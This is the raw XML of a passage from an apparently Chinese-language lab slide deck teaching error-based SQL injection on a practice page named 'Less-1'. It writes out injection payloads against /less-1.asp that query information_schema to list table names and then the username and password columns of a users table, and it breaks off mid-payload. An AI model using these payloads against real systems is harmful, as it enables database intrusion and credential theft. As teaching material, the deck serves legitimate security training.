                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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 not in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>('emails'))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a: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r>
              <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>依次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>爆出表名为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>emails</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 altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>uagents</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 altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>referers</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>TMP_DB</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 altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>sqlmapoutput</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E103CED-DDD2-7F4C-8304-3C3B048406E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="12697" t="26926" r="2652" b="9915"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213812" y="2294315"/>
            <a:ext cx="7582568" cy="1471239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07301770-E0F1-674E-9E3A-EDD58FBCFAAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="12230" t="30427" r="2895" b="9820"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213812" y="4739779"/>
            <a:ext cx="7582568" cy="1416416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12798943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400" dirty="0"/>
              <a:t>实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432647" y="3730414"/>
            <a:ext cx="8090747" cy="49243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defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549108" y="1020850"/>
            <a:ext cx="11717755" cy="577080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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Less-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>为例</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p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>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根据表名</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Helvetica"/>
              </a:rPr>
              <a:t>爆列名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>，可以获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>表中所有的列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> /less-1.asp?id=1' and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>')=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719982" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>其他字段名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> /less-1.asp?id=1' and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>='users' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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 not in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>('id'))=1 --</a:t>
            </a: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defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>依次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>爆出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>表的字段为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>id</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>username</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1BE6225-AE4C-9F45-B3A5-05F7AF2BCF05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="2544" t="15579" r="3548" b="15444"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074776" y="2626722"/>
            <a:ext cx="8731664" cy="1334095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6B4CD88-4F92-834E-877D-987B009C9DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="2193" t="14256" r="2456" b="11603"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074778" y="4842623"/>
            <a:ext cx="8731663" cy="1357885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19416033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sz="2400" dirty="0"/>
              <a:t>实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020850"/>
            <a:ext cx="11232815" cy="49398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spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Less-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>为例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>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统计表中共有多少条记录</a:t>
            </a:r>
            <a:endPar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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> /less-1.asp?id=1' 1=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
